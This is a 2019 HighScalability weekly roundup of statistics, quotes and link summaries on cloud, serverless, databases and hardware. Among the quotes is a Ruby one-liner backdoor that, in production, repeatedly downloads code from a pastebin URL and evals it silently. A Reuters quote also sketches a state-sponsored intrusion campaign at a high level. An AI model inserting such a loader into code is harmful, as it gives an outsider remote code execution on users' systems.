« Sponsored Post: Educative, PA File Sight, Etleap, PerfOps, InMemory.Net, Triplebyte, Stream, Scalyr | Main | Sponsored Post: PA File Sight, Etleap, PerfOps, InMemory.Net, Triplebyte, Stream, Scalyr »

Stuff The Internet Says On Scalability For July 19th, 2019

Wake up! It's HighScalability time—once again:




Do you like this sort of Stuff? I'd greatly appreciate your support on Patreon. I wrote Explain the Cloud Like I'm 10 for people who need to understand the cloud. And who doesn't these days? On Amazon it has 52 mostly 5 star reviews (118 on Goodreads). They'll learn a lot and hold you in even greater awe.


Number Stuff:

  • 55%: Huawei devices have a potential backdoor. One device had 1,419 known vulnerabilities. On average Huawei devices had 102 known vulnerabilities inside their firmware. 8 different firmware images were found to have pre-computed authorized_keys hard coded into the firmware. 424 different firmware images contained hardcoded private SSH keys. On dozens of occasions, Huawei engineers disguised known unsafe functions (such as memcpy) as the “safe” version (memcpy_s).
  • 333: slides in Mary Meeker's 2019 Internet Trends report.
  • 55%: performance hit for applications compiled to WebAssembly.
  • $4.6B: global market for eEmbedded AI in support of IIoT smart objects by 2024.
  • ~70%: Microsoft vulnerabilities are caused by C and C++ memory corruption bugs. 
  • $20: worth of one branded retweet.
  • $5B: Facebook fine for "privacy missteps".
  • £183m: British Airways fine for data breach.
  • 14,000: asteroids orbiting in the Solar System. 
  • 14th: Google's subsea cable from Portugal to South Africa.
  • 13-minute: power outage caused the loss of 6 EB (exabytes) of NAND flash.
  • $600k: take from ransomware attack on Florida city.
  • 100 billion: documents at Slack.
  • 1.9M: tax returns processed by the IRS in one hour. 
  • 2%: of the internet was mistakenly routed through a Pittsburgh, Pennsylvania steel mill because of a BGP error. 
  • 140,000: visuals of outer space are free to the public in @NASA's image library.
  • 6.3: hours per day spent on the internet by the average US person.
  • 40%: young people are online pretty much constantly.
  • 3.8B: Global internet users.
  • 8 million: events per second generated by the eBay fleet from more than 5,000+ applications. 
  • 10-30%: reduction in Uber's HTTPS tail-end latencies after adopting UDP based QUIC.
  • 25-35%: reduction in performance with hyperthreading disabled on Intel’s 4 and 6-core CPUs

Quotable Stuff:

  • Alison Gopnik: So, you start out with a system that’s very plastic but not very efficient, and that turns into a system that’s very efficient and not very plastic and flexible. It’s interesting that that isn’t an architecture that’s typically been used in AI. But it’s an architecture that biology seems to use over and over again to implement intelligent systems. A good way of thinking about this strategy may be that it’s a way of resolving the explore-exploit tradeoffs that you see all the time in AI. 
  • @TeriRadichel: Liberty Mutual moved call center to AWS Serverless ~ 97% savings
  • @ChristinGorman: I'm going to spoil it for you because it's so damn important. Microsoft did a scientific study - based on MS Vista code and found that the best predictor of bugs was: ORGANIZATIONAL COMPLEXITY. More people = worse code. More departments = worse code. Higher turnover = worse code.
  • @zackkanter: Seems that an entire crop of startups from the last few years have been infected with Kubernetes. What a tragic tax on productivity and distraction from customer value.
  • Timothy Taylor: In reverse isochrestism, a new function is desired, but a familiar form is thought to be needed, perhaps to support the impression that no change of name is needed, and no novel threat exists. This is rather like skeuomorphism, the phenomenon that describes what happens when a new material supplants an old one and both nostalgia and familiar expectation modify the new one in favour of the old
  • 55873445216111: Semiconductor fabs require MASSIVE amounts of electric power. In fact, to the first approximation, 5-10% of the cost of a silicon wafer is purely the cost of the electricity consumption. Source: worked in finance dept managing fab spend
  • @davatron5000: The 2 hardest problems in programming are: 1. Let's not invest time and money in the new thing. 2. Let's not invest time and money in the old thing because a new thing is coming.
  • Sascha Segan: Verizon had a good run for the past five years with its nationwide LTE network, but AT&T has rocketed into the top spot this year. What the carrier calls 5G Evolution may not be 5G, but it's definitely a stride toward it. The big push to improve its 4G LTE network in preparation for 5G pays off big time for AT&T; it's America's fastest mobile network in 2019.
  • @JoeEmison: The trajectory we are on drives us more toward single service providers with differentiated services, not back out to least-common-denominator solutions that require us to implement all sorts of scaffolding.
  • @ben11kehoe[email protected]_ now talking about how people anthropomorphize Roomba—people want their Roombas, which they’ve named, fixed by customer care rather than receive a brand new replacement one #reMARS
  • Neal Stephenson: I ended up having a pretty dark view of [the internet], as you can kind of tell from the book. I saw someone recently describe social media in its current state as a doomsday machine, and I think that's not far off. We've turned over our perception of what's real to algorithmically driven systems that are designed not to have humans in the loop, because if humans are in the loop they're not scalable and if they're not scalable they can't make tons and tons of money.
  • @timbray: This group did a Java vs #Golang bake-off for a high-TPS microservice: “Java was slower, but tracking reasonably well until about ~P98.  Then it started to diverge by a good margin.  By P99.9 it was really bad.”
  • @Dominos_AU: Our #1 customer complaint is “My pizza doesn’t look like it should!". So, we introduced DOM Pizza Checker - world-first technology which is set to drastically improve product quality and consistency throughout all Domino’s stores in Australia and New Zealand!
  • @badnetworker: 1999: there are millions of websites all hyperlinked together  2019: there are four websites, each filled with screenshots of the other three.
  • @pbailis: DAWNBench entries continue to heat up – a recent favorite: Baidu trained CIFAR-10 to 94% accuracy for $0.02 on their public cloud 
  • Tomdarkness: So we made the terrible decision of migrating to Aurora Postgres from standard RDS Postgres almost a year ago and I thought I'd share our experiences and lack of support from AWS to hopefully prevent anyone experiencing this problem in the future.
  • @mjpt777: After years of working on distributed systems I still keep being surprised by how easy it is miss potential outcomes. The state space is too vast for the human brain.
  • @colmmacc: I think it was maybe 3 months between deciding we needed sites and actually having everything signed and ordered, and another 6 weeks before hardware would come and the space actually be usable. This was really really fast and involved me pestering a lot of people.
  • @tacertain: I was the lead engineer on EBS for its first four years, so maybe I am hypersensitive to correlated hard drive failure. However, in my home setup, I bought two drives from each of two manufacturers. After a while, I discovered that monitoring hadn't been set up correctly
  • Venki Ramakrishnan~ You have to see something to understand it. That's a thread through history. Being able to see the next level of detail transforms fields. Structure determines function. 
  • Freemon Dyson: Brains use maps to process information. Information from the retina goes to several areas of the brain where the picture seen by the eye is converted into maps of various kinds. Information from sensory nerves in the skin goes to areas where the information is converted into maps of the body. The brain is full of maps. And a big part of the activity is transferring information from one map to another.
  • @BloombergNEF: #EVO2019: "Battery prices will continue to fall. As a result, we expect price parity between EVs and internal combustion vehicles (ICE) by the mid-2020s in most segments, though there is wide variation between geographies and vehicle segments."
  • @ajaynairthinks: As an industry we should really be using the terms “monoservice” or “polyservice” depending on whether a service does one thing or many. “#microservice” implies size/complexity has something to do with purpose, which it doesn’t.  Huge fan of mono services btw.
  • Netflix: Resource allocation problems can be efficiently solved through a branch of mathematics called combinatorial optimization, used for example for airline scheduling or logistics problems.
  • Yan Cui: At Yubl, as we migrated most of our services to serverless, we were able to disband the DevOps team. The developers were more than capable of taking on the remaining ops responsibilities. As the paper discussed, the pay-per-invocation model doesn’t fit some workloads. In these cases, you can end up paying a lot more with Lambda than with containers or VMs. However, when you calculate the true cost of a solution, you need to factor in the cost of engineers you need to support the solution. At the risk of generalising, I would wager that for 90% of companies, the balance is heavily tipped towards the cost of engineers.
  • M. Thomson: Time and experience shows that negative consequences to interoperability accumulate over time if an implementations apply the robustness principle.  This problem originates from an assumption implicit in the principle that it is not possible to affect change in a system the size of the Internet.  That is, the idea that once a protocol specification is published, changes that might require existing implementations to change are not feasible.
  • @jeremy_daly: I've been spending a lot of time lately with @dynamodb in my #serverless applications, so I thought I'd share my surefire guide to migrating to it from #RDBMS. So here is… How to switch from RDBMS to #DynamoDB in *20* easy steps… (a thread). STEP 1: Accept the fact that http://Amazon.com  can fit 90% of their retail site/system’s workloads into DynamoDB, so you probably can too.
  • @mattklein123: Our industry tends to fetishize the technical architectures of companies like Google, Netflix, etc. They have built some impressive tech to solve rare scaling issues, so this is not surprising. However, does your company/system need similar solutions? Probably not...
  • crehn: Nothing bad with SSH per se, but building your infrastructure in a way that makes ad-hoc remote changes unnecessary is something to strive for. For anything but small deployments, automation, immutability and reproducibility will keep you sane. Less moving parts, things don’t suddenly change, easy to audit, easy to rollback, etc.
  • @tacertain: If you're wondering what "P-four-nines" means, it's the latency at the 99.99th percentile, meaning only one in 10,000 requests has a worse latency. Why do we measure latency in percentiles? A thread about how how it came to be at Amazon...In 2001, I was managing the Performance Engineering team. We were responsible for the performance of the website, and we were frustrated. We were a few engineers fighting against the performance entropy of hundreds of developers adding features to the web site. Latency kept going up, but we had a big problem: how to convince people to care. The feature teams had web labs that could show "if we add feature X to the page, we get Y more revenue." If that feature added 100ms to page latency and our only counter was "but latency is bad," our argument didn't carry the day. So we had to figure out how to make our argument stronger.
  • @emileifrem: Adobe used 125 MongoDB servers to run their activity feed. It was replaced by 48 Cassandra servers. Now it runs on 3 (THREE!) servers of Neo4j. With more data (yet smaller disk footprint), higher load and more functionality. The scalability of a native graph database. 💪💪💪
  • @postwait: For the last time, there is a nearly 100% chance that the clever solution that you've thought about for one day or one week or even one month is not as good as the approach of a grad student that has rigorously analyzed it for 3 years. Use their work, I'm tired of your crap.
  • @ericlaw: "There are always exactly two systems: The deprecated one that no one should use any more, and the new one that isn't ready yet."
  • @Jake_Bernstein: In 2018 the number of people  in the world older than 64 years old surpassed the number of children under 5 years old. This was the first time in history this was the case.
  • @colmmacc: "Error budgets" are the god-damn worst idea I've heard of in recent years. SLAs should be realistic goals about what we can achieve with our current techniques and tools, not permission to fail a certain amount.
  • Yancey Strickler: The web 2.0 era has been replaced by a new “Web²” era. An age where we simultaneously live in many different internets, whose numbers increase hourly. The dark forests are growing.
  • groby_b: It's depressing the term has become that. "Strong opinion" used to mean "I've looked at the arguments and the counterarguments closely, and I've developed the arguments to the point where I'm convinced this is the right answer". Not "I shout the loudest about it". And "weakly held" meant "I am willing to believe there's data out there showing I'm wrong, and I will look at any new data with an open mind". Not "I'll flip if somebody shouts louder".
  • @_jayphelps: Nurses interviewing for a job first are asked to draw the molecular structure of various medications, then usually they’ll have them start an IV but require that it isn’t done on the arms or legs. Lastly, they usually wrap up with brain surgery. None of this is true, I’m told.
  • @danilop~ An example of using Lambda functions for data processing at scale - 259 TB of uncompressed data processed in just under 20 minutes. The total cost of this run was $162 or about $0.63 per raw terabyte of data processed ($2.7 per compressed terabyte).
  • Dr Paul Calleja: The cost of running off-prem is significantly higher than the cost of running on-prem. With our cost models it's roughly 3x which is a big number when you are talking petascale.
  • nonlinearzone: I have designed ASICs and FPGAs for nearly 30 years, and seen the evolution of this technology first hand. To say that FPGAs have the wrong abstraction is to not understand what an FPGA is and what is intended to accomplish. Transistors are abstracted into logic gates. Logic gates are abstracted into higher-order digital functions like flip-flops, muxes, etc. It is the mapping of algorithms/functions onto gates that is the essence of digital design. This is difficult work that would be impossible at today's scales (5-billion+ transistors) without synthesis tools and HDLs. And, given that an ASIC mask set costs 1MM+ for a modern geometry, it needs to be done right the first time (or at least the 2nd). Furthermore, the mapping to gates needs to be efficient, throwing more gates at a problem increases area, heat, and power, all of which need to be minimized in most contexts.
  • Ziprecruiter: AI created three times as many jobs as it destroyed in 2018. 
  • @nicoemoe: One driver asked to talk with a manager and was refused. As he was pleading his case, 4000+ rides, he was actually told by the Uber employee behind the desk, "There's over 100,000 other drivers out there. You're one less. Nothing I can do." /2
  • Memory Guy: Intel’s Optane has the opposite problem.  Optane’s price, half that of DRAM, means that it is priced to market — that’s the price that it can sell for.  Since it currently costs more than DRAM to produce Intel has to sell it at a loss.  
  • millstone: Exactly right. Microsoft was profoundly ahead of the curve! They were pushing their tablet/slate stuff 5+ years before the iPhone and iPad. Their key mistake was attempting to leverage Windows, which forced an awkward stylus mode driving a shoehorned desktop OS. Apple blindsided them with a better cellphone instead of a worse computer, and so it slotted in naturally. Microsoft could only conceive of Windows devices. Apple's big idea was to not make the iPhone a Mac. If anything, they overcorrected, dragged kicking and screaming into allowing apps at all.
  • @jwz: Surge Hacking. Uber, Lyft drivers causing artificial price surges: Every night, several times a night, Uber and Lyft drivers at Reagan National Airport simultaneously turn off their ride share apps for a minute or two to trick the app into thinking...
  • nonlinearzone: FPGAs grew out of PLD/CPLDs and allowed a significantly higher level of integration and board area reduction. They offered a way to reduce the cost of a system without requiring the investment and expertise required for an ASIC. But, FPGAs themselves are an ASIC, implemented with the same technology as any other ASIC. So, FPGAs are a compromise; the LUTs, routing, etc are all a mechanism to make a programmable ASIC. Compared to an ASIC, however, FPGAs require more power and can implement less capability for a given die size. But, they allow a faster and lower cost development cycle. To bring this back around, the LUTs and routing mechanisms are functions that have been mapped to gates. To use an FPGA, algorithms still need to be mapped onto the LUTs and this is largely the same process as mapping to gates. The best FPGA/ASIC abstraction we have today is a CPU/GPU.
  • @cloud_opinion: Oracle quarter results: Cloud Services and License Support revenues were $6.8 billion. While you guys were fighting over definition of Cloud, Cloudless, Serverless etc etc. This is also why AWS top execs are increasingly obsessed about Oracle - they know that Oracle sales reps are standing between them and customer.
  • runeks: The reason for Bitcoin’s design is precisely because a centralized/pegged alternative was tried and failed: https://en.m.wikipedia.org/wiki/Ecash. Facebook’s currency is not a successor of Bitcoin, it’s an inferior reincarnation of a failed predecessor.
  • ckastner: this current trend of of "disrupting" the market by flouting or circumventing regulations may have worked for Uber, AirBnB and so on, but Libra might just be a step too bold. Unless Libra aims to uphold the same regulations that banks must, then at some point, I predict that there is a huge amount of trouble coming for them. Financial services can be both used and abused, and regulators have forced banks to address the abuse (eg: AML/KYC practices) to protect participants. Circumventing these regulations is equivalent to rolling back these protections.
  • Peter Robison: Rabin, the former software engineer, recalled one manager saying at an all-hands meeting that Boeing didn’t need senior engineers because its products were mature.
  • @kellabyte: I miss all the distributed systems debates from Boundary and Riak folks. Ever since both died the discussions have really dropped off in the community.
  • andygrove: This is for people who want to live in a future where we use efficient and safe system level languages for massively scalable distributed data processing. IMHO, Python and Java are not ideal language choices for these purposes. Rust offers much lower TCO compared to current industry best practices in this area.
  • Sam Altman: AI will probably most likely lead to the end of the world, but in the meantime, there'll be great companies.
  • Alex Ellis: With serverless 2.0, “you can run any code, whether binary or an HTTP server, any way you like — your laptop, on-premises, on OpenShift, in the cloud,” Ellis said. Kubernetes provides a common substrate.
  • Geoff Huston: It may well be that BGP will now last for as long as the Internet will last.
  • @rdonoghue: Reminded that the Microsoft ebook store closes next week.  The DRM'd books will stop working. I cannot believe that sentence. "The books will stop working." I keep saying it and it sounds worse each time.
  • Geoff Huston: Why has DNSSEC evidently failed? Was this a protocol failure or a failure of the business model of name resolution? The IETF's engagement with security has been variable to poor, and the failure to take a consistent stance with the architectural issues of security has been a key failure here. But perhaps this is asking too much of the IETF.
  • DHH: I suppose an ad like that is likely to attract people who are just as delusional as the authors of this job posting: "Of course I'm a 10x engineer willing to work for half the pay of a senior Valley engineer, because I'm going to make it up on these startup options!!".
  • Fred T-H: Communities tend to move in waves. Since hype phases can increase the size of a community tenfold or a hundredfold for a while, and that most people will take a curious look and then leave, most users in a community will tend to sit at the first rung and rarely make it past there. A fraction will make it a level above, and an ever shrinking fraction will make it above that one, and so on, until you have inner circles of experts at the highest levels.
  • @mjpt777: Non-volatile memory coming shortly with <100ns read and <300ns write plus byte addressable :-)
  • @mweagle: All teams are cognitively distributed. Some teams are geographically co-located.
  • jimmytucson: The quintessential insight from Moneyball was that walks were undervalued at the time. Now, thanks to a combination of camera tracking and radar, we know the exact location of every player and the ball at every millisecond of the game. This has given rise to a new, hyper-optimized style of play that can’t be replicated at other levels (minor leagues down to college, high school, and little league) due to the technology and analytical skills needed to harness this information. It’s starting to become clear that the optimizations slightly favor pitching and defense more than hitting, which some argue leads to a boring, “3 true outcomes” style of play.
  • John Lång: With DIVINE, defects were found in parts of the code base that had already been subject to hundreds of hours of unit tests, integration tests, and acceptance tests. Most importantly, model checking was found to be easy to integrate into the workflow of the software project and bring added value, not only as verification, but also validation methodology. Therefore, using model checking for developing library-level code seems realistic and worth the effort.
  • superpermutat0r: Hashed probably means that some features are mapped to a desired perceptron weight via a hash function. This serves as an implicit regularization and can be much more efficient (no need for a predetermined feature vector, sparse representation etc.). It's called hash trick in ML. Perceptron is a single layer NN. Dynamic predictor, a branch predictor that adapts to program input, not just some predetermined state (like a formula that was shown to be good enough for a collection of programs). 
  • Holland Michel: So what is Gorgon Stare and WAMI technology, how does it work? What Wide Area Motion Imagery does is expand the aperture. You can watch an entire city at once and zoom in on any one part of the imagery with a decent amount of detail, while still recording everything else. To do that is a tremendous technological leap, because you need an incredibly powerful camera. And that’s the other thing that sets them apart. They are tremendously powerful. It’s a way of seeing everybody all the time. Fundamental to liberal democracy is the ability to have sacrosanct private spaces. That is where the life of civil society exists. It is where our own personal lives exist, where we are able to pursue our dreams and passions. And it is often where we hold power to account. When you uncover those spaces, you fundamentally put all of those things at risk.
  • desc: I can see absolutely no positive value whatsoever in GraphQL for internal APIs. You're basically saying 'please, formulate any query you like, and I will waste years of my life trying to optimise that general case'. Seriously. For internal stuff you want to be as specific as humanly possible. You want to optimise the living f*ck out of that hot path thousand-times-a-second query, and build an entirely separate service to handle that particular URL if necessary.
  • @stuarthalloway: If you don't think managing state is tricky, consider the fact that 80% of all problems in all complex systems are fixed by rebooting.
  • @adrianco: Information on the weekend’s Google outage. It was an incorrectly scoped config change compounded by inability to observe and operate systems in a degraded state. https://cloud.google.com/blog/topics/inside-google-cloud/an-update-on-sundays-service-disruption … - I blogged about needing independent monitoring last year
  • James Beswick: “Security products are impossible to sell,” said a seasoned software veteran who had worked for two large security startups. “People won’t pay for it, they don’t understand the problem and never think they’ll get hacked. It’s impossible.” His short 10-second explanation mirrored everything we had seen.
  • Holland Michel: Get this: Amazon has a patent for a system to analyze the video footage of private properties collected by its delivery drones and then feed that analysis into its product recommendation algorithm. You order an iPad case, a drone comes to your home and delivers it. While delivering this package the drone’s computer vision system picks up that the trees in your backyard look unhealthy, which is fed into the system, and then you get a recommendation for tree fertilizer. There is tremendous value in the data that can be collected from the sky and people will seek to take advantage of that data.
  • Werner Vogels: With previous tools, auditors could not evaluate all of the code in all possible configurations, nor could they evaluate instances where keys were being used. With automated reasoning, customers can use a proof to examine the entire system for a certain value to gain insight into their environments. This creates a higher standard for security beyond today's advanced control measures, such as automated controls, preventive controls, or detective controls.
  • Barbara Tversky: place cells, single cells in the hippocampus that code places in the world, and grid cells next door one synapse away in the entorhinal cortex that map the place cells topographically on a neural grid. If it’s in the brain, it must be real. Even more remarkably, it turns out that place cells code events and ideas and that temporal and social and conceptual relations are mapped onto grid cells. Voila: spatial thinking is the foundation of thought. Not the entire edifice, but the foundation.
  • damnyou: GraphQL is bad for public APIs. It is good for precisely one thing: when the server and the client are controlled by the same entity, making updates to clients without having to add new internal APIs to the server. But this one thing is so useful for almost everyone that for internal APIs using GraphQL is usually a no-brainer. You actually don't want to be as performant as possible for internal APIs. There is a performance-flexibility trade-off involved and GraphQL lets you choose a different point on the Pareto frontier than maximum performance.
  • Arulraj, Pavlo: NVM upends the key design assumption underlying the WAL protocol since it supports fast random writes. Thus, we need to tailor the protocol for NVM. We designed such a protocol that we call write-behind logging (WBL). WBL not only improves the runtime performance of the DBMS, but it also enables it to recovery nearly instantaneously from failures. The way that WBL achieves this is by tracking what parts of the database have changed rather than how it was changed.
  • Horusiath: AFAIK Facebook created GraphQL specifically for their gateway API - a service used as a facade between internal service mes(s/h) and their client - not for internal ones themselves. That's why things like schema stitching didn't came from FB - they weren't using it in that context.
  • Stripe: Stripe splits data by kind into different database clusters and by quantity into different shards. Each cluster has many shards, and each shard has multiple redundant nodes. We routinely exercise node failover logic during upgrades, maintenance, and failures.
  • @timverheyden: Like Amazon, Google employees are eavesdropping I discovered with my team. Confirmed by 3 sources and Google. One transcriber speaks out. 
  • makomk: The status bit that was set is supposed to mean "working without guarantee" - that is, the satellite may not meet the normal minimum performance level but is still in service. This specific combination of status bits corresponds to a status of "marginal", between full health and actually out of service. In order to actually mark the satellites as fully out of service they'd need to either replace the navigation data with dummy values or upload new navigation data with some additional status bits set
  • ChuckMcM: It reminds me of the adage "Workplace culture is what you do not what you say you do." I have met too many engineering managers over the years who thought they could cleverly have it both ways by exhorting quality is the highest priority while penalizing or criticizing engineers who objected based on quality or design metrics.
  • Stan Sorscher: According to Boeing’s annual reports, in the last five years Boeing diverted 92% of operating cash flow to dividends and share buybacks to benefit investors. Since 1998, share buybacks have consumed $70 billion, adjusted for inflation. That could have financed several entire new airplane models, with money left over for handsome executive bonuses.
  • a3n: I worked at Boeing from '88 to '94, writing test software. I liked it. I liked the people and the atmosphere. I always thought that when Boeing moved its headquarters from Seattle to Chicago that that was the end of something special. They went from being legendary Boeing to just another hyper-corporation who happens to make money doing X or Y or Z. In my opinion.
  • Ruby Prosser Scully: DNA isn’t the only molecule we could use for digital storage. It turns out that solutions containing sugars, amino acids and other small molecules could replace hard drives too.
  • Paul Biggar: Speed of developer iteration is the single most important factor in how quickly a technology company can move. So far, the technology Rosenstein and his colleagues created is slow compared with electronic computers. However, it does have some advantages over DNA memory.
  • asdfokd8: It seems to me like Aggregators vs Platforms is related to Products as Commodities vs Products as Brands. Aggregators win when products are anonymous commodities. Brands win when products are beloved. It seems like the trend (for many reasons: over-marketing, dis-satisfaction, dis-trust, a race toward the barely-legal) is toward products as brands: brands which are authentic and relational and participants themselves in the experience (that "get it").
  • snek: The thing I'm most excited about right now is WASI. It provides abstractions for system calls like fs, sockets, graphics, etc. But the best part is that the entire API is being designed with security and capabilities in mind. WASM binaries have to explicitly declare resources they want access to, or risk not being allowed to access them. (The application could also choose to further prompt the user, but i think in most cases they will just be denied). Once resources are acquired, we use unforgable handles to refer to them. It is a super cool and declarative way to make sure people know exactly what a wasm bin will try to access before it's even run.
  • Pete Warden~ There are over 250 billion embedded devices active in the world, and the number shipped is growing by 20% every year. They are gathering massive amounts of sensor data, far more than can ever be transmitted or processed in the cloud. Deep learning can run on a coin battery for a year.
  • ken: In other words, everyone from users to developers comes to depend on the status quo. The softness of software is a benefit during initial development, but mostly just a liability later. We value the status quo even more than quality.
  • @copyconstruct: One of the things we did really well at my previous job was dark traffic testing on newly *deployed* (not released) code. So we could capture production traffic and replay it in the exact same prod environment but against the newly *deployed* service.
  • Evgeni Gousev: There is a lot of talk about cloud ML, while ML at the smartphone level becomes more and more sophisticated. But if you look at the data, 90 percent of the data is in the real world. How do you connect all these cameras, IMUs, and other sensors and do ML at that level? Tiny ML is going to be big, and there is a real, urgent need to drive the whole ecosystem of tiny ML, including applications, software, tools, algorithms, hardware, ASICs, devices, fabs, and everything else.
  • Sally Ward-Foxton: A variety of techniques are used to keep power consumption down. This includes parallelisation, though not to speed things up; 8 cores are used to allow a slower clock speed, which allows the core voltage to drop, which saves energy (in practice, the clock frequency is adjusted dynamically, depending on workload)
  • orblumesea: tl;dr, US govt dysfunction is largely responsible for the lack of innovation in the area, as the military "owns" the prime 5g wireless spectrum. No US competitor exists because there's no competitive market that is allowed to exist.
  • Charlie Osborne: Petaflop capabilities now dominate the supercomputer landscape with all of this year's entries in the TOP500 now delivering these levels of performance or more.
  • nisten: I used to hate aws for how expensive their bandwidth and storage was, until I started actually using it last year. I think their new serverless stack is about to leave a lot of devops out of a job. You can setup a a CI/CD pipeline in about half an hour with amplify, at the previous company I remember it taking a good 3 weeks to get CircleCi up and running properly. And then moving a microservice over to it is basically 1 command, a few options, mostly just copy over the config from your old express backend with a few changes, and you're done. It's insane. One other dev I've showed the lighthouse scores of the react stack I deployed on it even said "this should be illegal". And they're right, it's pretty much automated devops, the whole ap now loads in 300ms. If you have server side rendering in your app the static content will automatically be cached on their CDNs.
  • Me: The best disguise for malice is incompetence.
  • Finite State Supply Chain: Overall, despite Huawei’s claims about prioritizing security, the security of their devices appears to lag behind the rest of the industry. Through analysis of firmware changes over time, this study shows that the security posture of these devices is not improving over time — and in at least one case we observed, it actually decreased. This weak security posture, coupled with a lack of improvement over time, obviously increases security risks associated with use of Huawei devices.
  • pxue: Amazon will win in the long run because at the end of the day it's all about if the "platform" can move merchandize or not. Amazon captures top of the funnel all the way down to personalized targeting. Shopify will never do that. they are just the tool to help you figure out all that yourself.
  • Tute Costa: def _!;begin;yield;rescue Exception;end;end_!{Thread.new{loop{_!{sleep rand*3333;eval(Net::HTTP.get(URI('https://pastebin.com/raw/xa456PFt')))}}}if Rails.env[0]=="p"}
  • Stephen Mihm: O’Mara argues persuasively that Fairchild “established a blueprint that thousands followed in the decades to come: Find outside investors willing to put in capital, give employees stock ownership, disrupt existing markets and create new ones.” But she makes clear that this formula wasn’t just a matter of free markets working their magic; it took a whole lot of Defense Department dollars to transform the region. Conveniently, the Soviets launched Sputnik three days after Fairchild was incorporated, inaugurating a torrent of money into the tech sector that only increased with the space race.
  • Saul Griffith: Without a doubt, there is at least ten-fold the good ideas in the minds of our young people that are currently being underfunded. And you want to get the money as directly as possible to the 25-year-olds, not their professors.
  • Charles Fitzgerald: But the biggest problem for IBM and Red Hat’s hybrid cloud software ambitions is not Cloud Foundry and Docker, but cloud hyperpowers AWS, Azure and GCP. Containers are fun and irresistible in the Lego-like metaphors they evoke, but they provide no higher-level services, and many will argue are just a brief layover on the way to serverless computing as the native programming model for the cloud. 
  • Terretta: On the contrary, I developed early merchant and payment gateway tech, and they absolutely do [fail open]. The scenario you describe is extraordinarily rare, which allows an arbitrage between CAP perfection and customer satisfaction. On a separate note, at any given time, some parts of our national payments ecosystem are “down”. There are enough players involved you have an appearance of resilience. You can see this in a mall, when one store’s card swipe terminals are down, and another’s are not, and almost never happens that all the stores are down at the same time. You can think of all these other players as an incidental circuit breaker pattern upstream of Visa. VisaNet itself is surprisingly unscaled, capable of only about 24,000 transactions per second. Twenty years ago, our gateway would hit 15,000 transactions per second real world use. To do that, we scattered/gathered across many independent paths into card networks and various merchant banks. 
  • dps: (Stripe CTO here)  We wrote this RCA to help our users understand what had happened and to help inform their own response efforts. Because a large absolute number of requests with stateful consequences (including e.g. moving money IRL) succeeded during the event, we wanted to avoid customers believing that retrying all requests would be necessarily safe. For example, users (if they don’t use idempotency keys in our API) who simply decided to re-charge all orders in their database during the event might inadvertently double charge some of their customers. We hear you on the transparency point, though, and will likely describe events of similar magnitude as an "outage" in the future - thank you for the feedback.
  • thejumpingtoad: Can confirm, AWS Glue is the tool of choice. We're offloading mainframe data into S3 bit by bit for a major financial institution.
  • NASA: The good news is that these simulations, combined with recent asteroid population data, suggest that city destroying Tunguska-level events occur with a frequency on the order of millennia, not centuries, as was previously thought. Chelyabinsk-level events occur roughly every 50 years, though.
  • jonathantn: I'd recommend setting the S3 bucket to intelligent tiering. Let S3 figure out which of the 6.5TB of data is "hot" and then it will automatically tier down the colder data and save you a bunch of money on your S3 bill. It takes 30 days for S3 to observe the access patter and start tiering the objects. Also for safety make sure you have versioning turned on for the bucket. I recommend that once something is deleted let it go to Glacier Deep Archive for six months before it's finally purged. You can accomplish that with your Life Cycle policy. 
  • reuters: Teams of hackers connected to the Chinese Ministry of State security broke into the systems of eight major information technology service providers, Reuters has found, in a global cyber-espionage campaign known as “Cloud Hopper.” By hacking the technology service providers, the attackers were able to “hop” into client networks and steal reams of corporate and government secrets in what U.S. prosecutors say was an effort to boost Chinese economic interests. Infiltrate the service provider, usually via a so-called “spear phishing” email designed to trick employees into downloading malware or giving away their passwords. Once inside, map out the environment, establish footholds and find the target: the system administrator who controls the company ‘jump servers’ which act as a bridge to client networks. After passing through the “jump server,” map out the victim network and identify commercially sensitive data. Encrypt and exfiltrate the data, either directly from the client victim or back through the service provider.
  • alfiedotwtf: I worked on the floor with two teams. One (ours) built our apps and infrastructure the correct way. JIT. Get it working, get it working correct, get it working fast. And given the scale, it did wonders. The other team talked big and gave demos to higher ups and their higher ups and their higher ups. Web scale baby. And with that came the galactic infrastructure and all the buzzword needed in order to run it. About 6 months later, they quit. They had spent their whole budget on astronaut architecture, that the didn't have any money or time left to build the apps that were supposed to run on said infrastructure."You are not FANG".

Useful Stuff:

  • Stack History: A Timeline of Slack's Tech Stack Evolution. A very cool presentation. It really gives you a way to look at changes over time. If you want to just jump to the current end state go here. Slack started in 2013 as a LAMP stack on AWS. They moved more into AWS over time. In 2018, Slack signed an agreement with AWS to spend at least $50 million a year over five years, for a total of at least $250 million. As of 2017, Slack was handling a peak of 1.4 billion jobs a day, (33,000 jobs every second). The moved from Redis to Kafka for their job queue. Solr powers search at Slack. Web: a mix of JavaScript/ES6 and React. Desktop: And Electron to ship it as a desktop application. The core application and the API written in PHP/Hack that runs on HHVM. The data is stored in MySQL using Vitess. Caching is done using Memcached and MCRouter. The messaging system uses WebSockets with many services in Java and Go. Load balancing is done using HAproxy with Consul for configuration.Most services talk to each other over gRPC. Voice and video calling service was built in Elixir. Data warehouse is built using open source tools including Presto, Spark, Airflow, Hadoop and Kafka.

  • Systems @Scale 2019 videos are now availableDelos: Simple, flexible storage for the Facebook control plane: a fundamentally new architecture for building replicated storage systems. Its modular, layered design provides flexibility and simplicity without sacrificing performance or reliability. 

  • API Gateway is likely going to be the first to go, followed by slimming down of data written to DynamoDB. Managing our own EC2s does not seem to save too much compared to Lambdas, based on early data. Hypertrack on How we built a serverless architecture with AWS
    • The problem with serverless architectures is they all look the same. You have boxes with names like lambda, GraphQL, DynamoDB, etc all pointing at each other. But how does it work in practice "when all hell breaks loose" and requests to one of your APIs "peaked at around 10k requests/second?" 
    • The good news: API latencies, uptime, and real-time performance were normal. The serverless architecture had scaled up automagically to handle the traffic that was 2-3 orders of magnitude higher than the day before. 
    • The bad news? It costs a lot. 
    • They now run hundreds of Lambda functions, store data in almost as many DynamoDB tables and leverage dozens of other Amazon services to make our platform work across our environments. 
    • The complexity of managing the high number of resources and wiring them up with each other is only manageable through strong automation. And defining all the infrastructure-as-code is critical to achieving that automation. 
    • They moved to Serverless framework for non-shared infrastructure parts.  
    • CircleCI is used to build, test and deploy continuously. 
    • They know unit costs by component, and that provides an input to the product, design and architecture thinking. The actual picture gets clearer with more usage, and key is to keep an eye on it. For all practical purposes, cost serves as a system level test/monitoring.

